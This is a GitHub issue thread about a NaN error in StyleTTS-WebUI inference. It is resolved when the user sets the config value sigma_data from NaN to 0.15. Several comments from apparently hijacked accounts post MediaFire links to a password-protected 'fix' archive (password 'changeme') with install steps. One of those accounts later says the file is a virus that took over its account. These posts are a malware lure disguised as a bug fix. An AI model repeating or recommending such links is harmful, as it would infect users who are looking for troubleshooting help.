### ISSUE TITLE
ValueError: cannot convert float NaN to integer

### ISSUE THREAD

**Issue by edbartz** [JarodMica/StyleTTS-WebUI#24]
Sorry to be such a pest, but I have another problem.   If I just use models\pretrain_base_1\epochs_2nd_00020.pth,  I can generate speech.  I have trained two different voices so far.  The training finished, and I tried to generate with a trained .pth file in settings.   I never get any speech, and I get the following error:
bert loaded
bert_encoder loaded
predictor loaded
decoder loaded
text_encoder loaded
predictor_encoder loaded
style_encoder loaded
diffusion loaded
text_aligner loaded
pitch_extractor loaded
mpd loaded
msd loaded
wd loaded
Traceback (most recent call last):
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\queueing.py", line 536, in process_events
    response = await route_utils.call_process_api(
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\route_utils.py", line 288, in call_process_api
    output = await app.get_blocks().process_api(
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\blocks.py", line 1931, in process_api
    result = await self.call_function(
             ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\blocks.py", line 1516, in call_function
    prediction = await anyio.to_thread.run_sync(  # type: ignore
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio\to_thread.py", line 56, in run_sync
    return await get_async_backend().run_sync_in_worker_thread(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio\_backends\_asyncio.py", line 2177, in run_sync_in_worker_thread
    return await future
           ^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio\_backends\_asyncio.py", line 859, in run
    result = context.run(func, *args)
             ^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\utils.py", line 826, in wrapper
    response = f(*args, **kwargs)
               ^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\webui.py", line 114, in generate_audio
    wav1 = inference(text, ref_s, model, sampler, textcleaner, to_mel, device, model_params, global_phonemizer=global_phonemizer, alpha=alpha, beta=beta, diffusion_steps=diffusion_steps, embedding_scale=embedding_scale)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\styletts2\utils.py", line 203, in inference
    pred_aln_trg = torch.zeros(input_lengths, int(pred_dur.sum().data))
                                              ^^^^^^^^^^^^^^^^^^^^^^^^
ValueError: cannot convert float NaN to integer

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JarodMica** [comment]
> Sorry to be such a pest, but I have another problem. If I just use models\pretrain_base_1\epochs_2nd_00020.pth, I can generate speech. I have trained two different voices so far. The training finished, and I tried to generate with a trained .pth file in settings. I never get any speech, and I get the following error: bert loaded bert_encoder loaded predictor loaded decoder loaded text_encoder loaded predictor_encoder loaded style_encoder loaded diffusion loaded text_aligner loaded pitch_extractor loaded mpd loaded msd loaded wd loaded Traceback (most recent call last): File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\queueing.py", line 536, in process_events response = await route_utils.call_process_api( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\route_utils.py", line 288, in call_process_api output = await app.get_blocks().process_api( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\blocks.py", line 1931, in process_api result = await self.call_function( ^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\blocks.py", line 1516, in call_function prediction = await anyio.to_thread.run_sync( # type: ignore ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio\to_thread.py", line 56, in run_sync return await get_async_backend().run_sync_in_worker_thread( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio_backends_asyncio.py", line 2177, in run_sync_in_worker_thread return await future ^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\anyio_backends_asyncio.py", line 859, in run result = context.run(func, *args) ^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\gradio\utils.py", line 826, in wrapper response = f(*args, **kwargs) ^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\webui.py", line 114, in generate_audio wav1 = inference(text, ref_s, model, sampler, textcleaner, to_mel, device, model_params, global_phonemizer=global_phonemizer, alpha=alpha, beta=beta, diffusion_steps=diffusion_steps, embedding_scale=embedding_scale) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\xxx.xxx\Desktop\TTS\StyleTTS-WebUI\venv\Lib\site-packages\styletts2\utils.py", line 203, in inference pred_aln_trg = torch.zeros(input_lengths, int(pred_dur.sum().data)) ^^^^^^^^^^^^^^^^^^^^^^^^ ValueError: cannot convert float NaN to integer

Can you check inside of the config files and make sure none of the parameters values are NaN?

If they are, you can change them to a small value

**Comment by edbartz** [comment]
Should mention I am now downloading the package.  I figure that since I am pestering you so much, and have been doing so much with your code, etc.  I really should join. 
Ed.  aka physengineer.

**Comment by edbartz** [comment]
I am not completely sure I followed what was said in TTS2#101, but I will mention that I only have a 3070ti at the moment (3090 on order), so I trained the Diffusion Epoch and Joint Epoch set > number of epochs.  So 101 may apply.

**Comment by edbartz** [comment]
Damn, just found it.  Yes sigma_data: .nan.   That will will teach me to read, and not just search a file for what I am looking for.  I will try retraining with that set to say 1.

**Comment by JarodMica** [comment]
> Damn, just found it. Yes sigma_data: .nan. That will will teach me to read, and not just search a file for what I am looking for. I will try retraining with that set to say 1.

All good! You may not need to retrain, just manually change the sigma value to something like 0.2 or 0.15 and it should be fine.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by edbartz** [comment]
Yes, changing the sigma to 0.15 fixed both voices.  Thanks again.   Now, I can think about modding the Audiobook maker to use styleTTS2.   Tortoise does some inconsistent things for me at times.  I am hoping styletts is better in that respect.

**Comment by JarodMica** [comment]
Awesome!  Then we can close this issue.  Wish you luck on that!

**Comment by edbartz** [comment]
You will probably finish long before I figure it out, but I have to do something to keep busy.  ;-)

**Comment by MinecraftEarthVillage** [comment]
> 下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
